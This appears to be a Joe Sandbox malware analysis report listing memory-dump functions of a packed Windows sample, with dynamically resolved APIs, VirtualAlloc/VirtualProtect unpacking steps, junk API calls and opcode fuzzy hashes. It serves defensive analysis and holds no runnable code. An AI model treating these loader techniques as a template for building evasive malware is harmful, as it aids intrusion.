Source File: 00000000.00000002.1330033651.000000000040A000.00000020.00020000.sdmp, Offset: 0040A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40a000_y98WYYcJ2U.jbxd

Similarity

API ID: BufferCalendarConsoleCountDisconnectErrorHandleInfoLastLocalModuleNamedPipePrivateProfileScreenScrollStructTickTimelstrlen
String ID: pubiyet
API String ID: 603241746-2616555163
Opcode ID: 5057ec19540696dc9ec27dba1510ebcfbb3ae0e4200e6452ccc28b7f85dacc59
Instruction ID: 2a6ca404c8129a3782f5eb46421d3846dd73fdcc0c16105fd1f98f75e214d1ff
Opcode Fuzzy Hash: 5057ec19540696dc9ec27dba1510ebcfbb3ae0e4200e6452ccc28b7f85dacc59
Instruction Fuzzy Hash: 85C19831A44700DBE360EF50EC46FFA7BA0ABD8705F11843AF649A62D0D7B49945CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 001D003C, Relevance: 25.0, APIs: 12, Strings: 2, Instructions: 515
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNELBASE(?,VirtualAlloc), ref: 001D00CB
GetProcAddress.KERNELBASE(?,VirtualProtect), ref: 001D0103
GetProcAddress.KERNELBASE(?,VirtualFreect), ref: 001D0131
GetProcAddress.KERNELBASE(?,GetVersionExA), ref: 001D0169
GetProcAddress.KERNELBASE(?,TerminateProcess), ref: 001D01A5
GetProcAddress.KERNELBASE(?,ExitProcess), ref: 001D01DD
GetProcAddress.KERNELBASE(?,SetErrorMode), ref: 001D0212
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 001D024D

Strings

cess, xrefs: 001D018D
kernel32.dll, xrefs: 001D008F, 001D0095

Memory Dump Source

Source File: 00000000.00000002.1329945189.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_y98WYYcJ2U.jbxd

Similarity

API ID: AddressProc$AllocVirtual
String ID: cess$kernel32.dll
API String ID: 802338936-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: 5cac8f34589bda432158cfd6f0643e48c0dca88d795a3c02213700adbabb0b72
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: E2526974A01229DFDB65CF58C984BA8BBB1BF09304F1580DAE94DAB351DB30AE85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00401758, Relevance: 3.1, APIs: 2, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_y98WYYcJ2U.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4c8309c2a24fcc51191ea963f19067c78cc8f875b56428fae94b1c79f670c2c
Instruction ID: c6441cc346e92ca072ef23a0e0b79487788e53480e744a4ad4e1e76d46de8cb3
Opcode Fuzzy Hash: b4c8309c2a24fcc51191ea963f19067c78cc8f875b56428fae94b1c79f670c2c
Instruction Fuzzy Hash: 66317B37604211DBCB01BBB4A8819E97724EF81315714C67BE5127F1F6C53C5A0AD3AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040182B, Relevance: 3.0, APIs: 2, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401869
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401891

Memory Dump Source

Source File: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_y98WYYcJ2U.jbxd

Yara matches

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: c747a25e27b0af8b684f841e091e5895b40a5bb203c061b1a9a9a3ca035fde38
Instruction ID: 80ce2bf07f7b35e38f138f47ea3507ad8089e7cbd65b1b0df074c882d51623cf
Opcode Fuzzy Hash: c747a25e27b0af8b684f841e091e5895b40a5bb203c061b1a9a9a3ca035fde38
Instruction Fuzzy Hash: 34016233608204E7EB007A959D41DBA361CDF41314F20C137BA13B51F2C93C8B12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401837, Relevance: 3.0, APIs: 2, Instructions: 41
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401869
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401891

Memory Dump Source

Source File: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_y98WYYcJ2U.jbxd

Yara matches

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: ddcf5ddec56d3d1699a12ce3b66f2a00ff12e6935bb28500d2c8b1cf01cb5654
Instruction ID: 32299dd3076a42e20a9c441a7996de3b0dc4399f53cd3b201d1612ad1b9187af
Opcode Fuzzy Hash: ddcf5ddec56d3d1699a12ce3b66f2a00ff12e6935bb28500d2c8b1cf01cb5654
Instruction Fuzzy Hash: A0F04F33608204E7EB007AD59D41AB93628DF45314F20C677BA13B51F2CA3C8B12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401856, Relevance: 3.0, APIs: 2, Instructions: 38
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401869
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401891

Memory Dump Source

Source File: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_y98WYYcJ2U.jbxd

Yara matches

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 013e617bd7596663f16091f1decbe489fc146b4c63b91c7c1f9d023d6138dc6e
Instruction ID: 8fe395452dd23f0c4eba946f083a1334c2d2a1943cd8bca78e82f84dc9cf33b8
Opcode Fuzzy Hash: 013e617bd7596663f16091f1decbe489fc146b4c63b91c7c1f9d023d6138dc6e
Instruction Fuzzy Hash: 40F06233604204E7EB007A948D41EBD3758DF44314F608277BA12B40F2CA3C8B12AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 0040184B, Relevance: 3.0, APIs: 2, Instructions: 37
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401869
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401891

Memory Dump Source

Source File: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_y98WYYcJ2U.jbxd

Yara matches

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 6198c2d79bc45e8b3479ed0cbd8e36534cc8ebf39bb385a142b1e8a399c00083
Instruction ID: 6f712b842325da696bae222ccf6ea526447c3457aa2c1ee517eb8411d38130b8
Opcode Fuzzy Hash: 6198c2d79bc45e8b3479ed0cbd8e36534cc8ebf39bb385a142b1e8a399c00083
Instruction Fuzzy Hash: D4F06D33604204E7EB007A948D40EBE3728DF44314F208277BA12B51F2CA3C8A12AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 004017DA, Relevance: 1.6, APIs: 1, Instructions: 62
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401891

Memory Dump Source

Source File: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_y98WYYcJ2U.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: bc25cc0625078d6b15d93a752f93e0df4f32f5db045c427dca5b9ea50289403a
Instruction ID: 3cc8350b1f1557bd4de6d230e0c4986aaf396c4fd76ba13da8014aff11ad1ef8
Opcode Fuzzy Hash: bc25cc0625078d6b15d93a752f93e0df4f32f5db045c427dca5b9ea50289403a
Instruction Fuzzy Hash: 9001893360418191EB043AA55840ABD3B209F91339B74DB37F662B50E3DA7E8206D36F

Uniqueness

Uniqueness Score: -1.00%

Function 7268A37A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(726D16A5,000000FF,00000007,?,00000004,00000000,?,?,?,726D1391,00000065,00000000,?,726D069E,?,00000000), ref: 7268A394

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8df3d553960370cf5bee78c41be5d04eb44450146372d0bd51923261f19e48b9
Instruction ID: ddf27d31c4110add4305f9e16653e471b05f0663669469a0797b77fe613f72dd
Opcode Fuzzy Hash: 8df3d553960370cf5bee78c41be5d04eb44450146372d0bd51923261f19e48b9
Instruction Fuzzy Hash: D3B09B719454C5C6D741D764470871B7A1577D1701F25C457E1438645A4F78C491F179

Uniqueness

Uniqueness Score: -1.00%

Function 7268A360, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(726D12FF,000000FF,00000000,00000000,0000000C,00001000,00000004,72720200,0000001C,726D1056), ref: 7268A36A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e3851bbc2d58eae9e78d27da81f430cca4aa9bb0a12ed84acbc622db7dc0063
Instruction ID: 36e763bc110eb49d64ef6a93a395d4b410b80dc6bbbe80cbd65fec70b027360f
Opcode Fuzzy Hash: 8e3851bbc2d58eae9e78d27da81f430cca4aa9bb0a12ed84acbc622db7dc0063
Instruction Fuzzy Hash: 3190023520504842D5C0755C464464E100557D2301FA1D41BE0429619DCE158A5977A9

Uniqueness

Uniqueness Score: -1.00%

Function 7268A300, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(7264E062,?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 7268A30A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 014ce5f9f620de262c027691061095b42402e75a7c2a8c43e99a25650ab442e7
Instruction ID: 43b5c625d0e0929fd2e0bd2fc2b5468257102c7a545d7670426a9082ae1014e7
Opcode Fuzzy Hash: 014ce5f9f620de262c027691061095b42402e75a7c2a8c43e99a25650ab442e7
Instruction Fuzzy Hash: 8890023520504482D540665C4644B4E510567E1301F61D41BE0818619D8D5588617129

Uniqueness

Uniqueness Score: -1.00%

Function 7268A6A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(726D1499,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 7268A6AA

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe9fbff52d586e793eb724bf39703d25a8d098580b7774c0370f02834c6f8444
Instruction ID: c1a907625f743c6ddebf9317d4ff4f8b48aac94305bda4dea1259b52b9d3a156
Opcode Fuzzy Hash: fe9fbff52d586e793eb724bf39703d25a8d098580b7774c0370f02834c6f8444
Instruction Fuzzy Hash: 2890027534504482D540655C4654B0A100597E2301F61D41BE1468519D8E19CC52712E

Uniqueness

Uniqueness Score: -1.00%

Function 7268A480, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(726D14B9,?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?,?,00000004), ref: 7268A48A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c339804aeb338a847f69c288b92d3a239e87151889f2783cdc1a77cf8119dba
Instruction ID: 9669ded19e4cd179787dd8aa0b61aa87a38e8e6638ca8ae508bd4328f2864410
Opcode Fuzzy Hash: 2c339804aeb338a847f69c288b92d3a239e87151889f2783cdc1a77cf8119dba
Instruction Fuzzy Hash: 9B90023D21704042D5C0755C564860E100557D2202FA1E81BE041951DCCD1588696329

Uniqueness

Uniqueness Score: -1.00%

Function 7268A560, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(726D0FFB,00000073,?,00000008,00000000,?,00000568), ref: 7268A56A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1faaaed5dde29e769f1717b0d5e9b1241d22d9f777c59b962ba9060ccd24f71e
Instruction ID: 3e083340864ced2108fede672f131d51174228beddaea6fba0314e59bffd7c79
Opcode Fuzzy Hash: 1faaaed5dde29e769f1717b0d5e9b1241d22d9f777c59b962ba9060ccd24f71e
Instruction Fuzzy Hash: A590023520504453D551655C474470B100957D1241FA1D817E082851DD9E568952B129

Uniqueness

Uniqueness Score: -1.00%

Function 7268A520, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(726A5EB2,?,00000000,00000000,?,00000200,?,?,00020019,?,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages\PendingDelete,00000000,?), ref: 7268A52A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 95fcfc618cca2af0a7f0253c797309f4ffe1d2a79cc811032ae62e32aedb7d33
Instruction ID: d65bc434bd2ab2a0deae506b6343f87d10f28ebf6a098464ad2c57f160ffeaea
Opcode Fuzzy Hash: 95fcfc618cca2af0a7f0253c797309f4ffe1d2a79cc811032ae62e32aedb7d33
Instruction Fuzzy Hash: 2D90023524504442D581755C464460A100967D1241FA1D417E0828519E8E558A56BA69

Uniqueness

Uniqueness Score: -1.00%

Function 7268A5C0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(726D0ACE,000000FF,000000FF,000000FF,?,001FFFFF,00000002,00000000,727201C0,00000058,726D06D1,?,00000000,?,00000000), ref: 7268A5CA

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 11e2a83cd152c39ad556c65eed8397599bfda9073674c33e17661dbe5fe50735
Instruction ID: fbd34c9660b6fde3d0d611b9233b8d99ed84205c3571f4be62a8a50b248df677
Opcode Fuzzy Hash: 11e2a83cd152c39ad556c65eed8397599bfda9073674c33e17661dbe5fe50735
Instruction Fuzzy Hash: 09900235205044C2E541655C4644F0A200957E1241FA1D41BE142D529D8E15C952B22D

Uniqueness

Uniqueness Score: -1.00%

Function 00415C29, Relevance: 18.2, APIs: 12, Instructions: 234
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415C44
GetLastError.KERNEL32(?,00000000), ref: 00415CCA
GetModuleHandleA.KERNELBASE(0041AC60), ref: 00415CDE
GlobalAlloc.KERNELBASE(00000000,005089E4), ref: 00415D2C
OpenSemaphoreW.KERNEL32(00000000,00000000,00000000), ref: 00415D8E

Memory Dump Source

Source File: 00000000.00000002.1330033651.000000000040A000.00000020.00020000.sdmp, Offset: 0040A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40a000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocCalendarErrorGlobalHandleInfoLastModuleOpenSemaphore
String ID:
API String ID: 635961860-0
Opcode ID: a2a3fc33bcdfc5b9d000ead8c3167b5c851cf9add8be0a6643cbb920b1b08a31
Instruction ID: 74e668e5fad2b0a05b43381d72515ba6aae4ff729e9af553e9ad64f1cd160aff
Opcode Fuzzy Hash: a2a3fc33bcdfc5b9d000ead8c3167b5c851cf9add8be0a6643cbb920b1b08a31
Instruction Fuzzy Hash: 7B81C831A44710DBD360EF60EC46BFA7BA0ABDC705F12843AF549A72D0D77498858B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00415CF9, Relevance: 13.7, APIs: 9, Instructions: 184
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(00000000,005089E4), ref: 00415D2C
OpenSemaphoreW.KERNEL32(00000000,00000000,00000000), ref: 00415D8E
SetVolumeLabelA.KERNEL32(00000000,00000000), ref: 00415DC7
FindActCtxSectionStringA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415DED
FindResourceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415DFB
OpenMutexW.KERNEL32(00000000,00000000,00000000), ref: 00415E3A
FillConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00415E5B
GetModuleHandleA.KERNELBASE(0041747C), ref: 00415E6E

Memory Dump Source

Source File: 00000000.00000002.1330033651.000000000040A000.00000020.00020000.sdmp, Offset: 0040A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40a000_y98WYYcJ2U.jbxd

Similarity

API ID: FindOpen$AllocCharacterConsoleFillGlobalHandleLabelModuleMutexOutputResourceSectionSemaphoreStringVolume
String ID:
API String ID: 3915977934-0
Opcode ID: 761d74cbd5ccb224e09edc5b00bc11406b4d09d21172bdc87ec825aa703d65e6
Instruction ID: 583c31dec00892ee3d59663d4a850d89027fc00a1aa4da8e5755e6858f9900e2
Opcode Fuzzy Hash: 761d74cbd5ccb224e09edc5b00bc11406b4d09d21172bdc87ec825aa703d65e6
Instruction Fuzzy Hash: F261B531A44710DAE360EF60ED46BFA7BA0ABDC701F12843AF549A72D0C77499458B6E

Uniqueness

Uniqueness Score: -1.00%

Function 001D092B, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNELBASE(00000000,GetProcAddre), ref: 001D0A20

Strings

GetProcAddress., xrefs: 001D09DC, 001D09DF, 001D09E4
., xrefs: 001D095F
l, xrefs: 001D0966

Memory Dump Source

Source File: 00000000.00000002.1329945189.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_y98WYYcJ2U.jbxd

Similarity

API ID: AddressProc
String ID: .$GetProcAddress.$l
API String ID: 190572456-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 5736b5a840de110200a39a70378d47516612f6622e46b00aa948677559c14fab
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 42316CB6900609DFDB15CF99C880BAEBBF5FF48328F25404AD445A7311D7B1EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415E1B, Relevance: 6.1, APIs: 4, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexW.KERNEL32(00000000,00000000,00000000), ref: 00415E3A
FillConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00415E5B
GetModuleHandleA.KERNELBASE(0041747C), ref: 00415E6E
GlobalUnWire.KERNEL32(00000000), ref: 00415F29

Memory Dump Source

Source File: 00000000.00000002.1330033651.000000000040A000.00000020.00020000.sdmp, Offset: 0040A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40a000_y98WYYcJ2U.jbxd

Similarity

API ID: CharacterConsoleFillGlobalHandleModuleMutexOpenOutputWire
String ID:
API String ID: 576928629-0
Opcode ID: c74cb26509612a123d055d1b505079f91fd2514c94e4d3d08e780173bdb712a7
Instruction ID: 149c07578d33bbfb9a113376b92b0eae70174300a002fdb5446d5ef0bd5cae99
Opcode Fuzzy Hash: c74cb26509612a123d055d1b505079f91fd2514c94e4d3d08e780173bdb712a7
Instruction Fuzzy Hash: 0B319D71908700DAD350EF60EC46BEBBBA1ABDC715F01843EF588A7290D67499858B6F

Uniqueness

Uniqueness Score: -1.00%

Function 00415719, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(005086F8,005089E4,00000020,?), ref: 00415756

Strings

, xrefs: 0041573D

Memory Dump Source

Source File: 00000000.00000002.1330033651.000000000040A000.00000020.00020000.sdmp, Offset: 0040A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40a000_y98WYYcJ2U.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 3984d195faabaaaa71a73a1fd0fd6b319001989a47ec67ae9ce828dc32ea54c4
Instruction ID: af42296d3ce75aba6977c8d294300ffb4a06f95f351a3db1d5dd3dc8ed89ca2e
Opcode Fuzzy Hash: 3984d195faabaaaa71a73a1fd0fd6b319001989a47ec67ae9ce828dc32ea54c4
Instruction Fuzzy Hash: 10E092B080120CBBC704DF94ED499ADBB7DE745210F114384E80943245D631AE499B91

Uniqueness

Uniqueness Score: -1.00%

Function 00415730, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(005086F8,005089E4,00000020,?), ref: 00415756

Strings

, xrefs: 0041573D

Memory Dump Source

Source File: 00000000.00000002.1330033651.000000000040A000.00000020.00020000.sdmp, Offset: 0040A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40a000_y98WYYcJ2U.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: bcab4ab3e49ab73881333afa9e51d79b3890f689247d2e0dca4a1ccb353f59c0
Instruction ID: f302cdecb8c3a6a3614cbb11a98c9f940fea41a9c4e42e1bf30f5ee8c5228510
Opcode Fuzzy Hash: bcab4ab3e49ab73881333afa9e51d79b3890f689247d2e0dca4a1ccb353f59c0
Instruction Fuzzy Hash: 4CD0127590120CFFDB00DFD4ED49DBE7B7CE758204F114294E80853201D670AE489B95

Uniqueness

Uniqueness Score: -1.00%

Function 001D0DF8, Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,001D0223,?,?), ref: 001D0E02
SetErrorMode.KERNELBASE(00000000,?,?,001D0223,?,?), ref: 001D0E07

Memory Dump Source

Source File: 00000000.00000002.1329945189.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_y98WYYcJ2U.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4ca35cba524278211d2563115aae18c8d35262dd7c0b95d58829b9ced9e98a00
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 95D0123114512C77D7012A94DC09BCD7B1C9F05B66F008011FB0DD9181C770994046E6

Uniqueness

Uniqueness Score: -1.00%

Function 001D0D90, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetVersionExA.KERNELBASE(?), ref: 001D0DAA

Memory Dump Source

Source File: 00000000.00000002.1329945189.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_y98WYYcJ2U.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction ID: 967536170cbee924f6362285175f8cd608a33e97eb26d93cd04c5102076116ef
Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction Fuzzy Hash: 1CF0C277A00A049FDB22CFA4C805BAE73FAFB88315F0441A6D80AD7345D330ED428B50

Uniqueness

Uniqueness Score: -1.00%

Function 00415F80, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetVolumeLabelA.KERNEL32(00000000,00000000), ref: 00415FB9

Memory Dump Source

Source File: 00000000.00000002.1330033651.000000000040A000.00000020.00020000.sdmp, Offset: 0040A000, based on PE: false

Joe Sandbox IDA Plugin

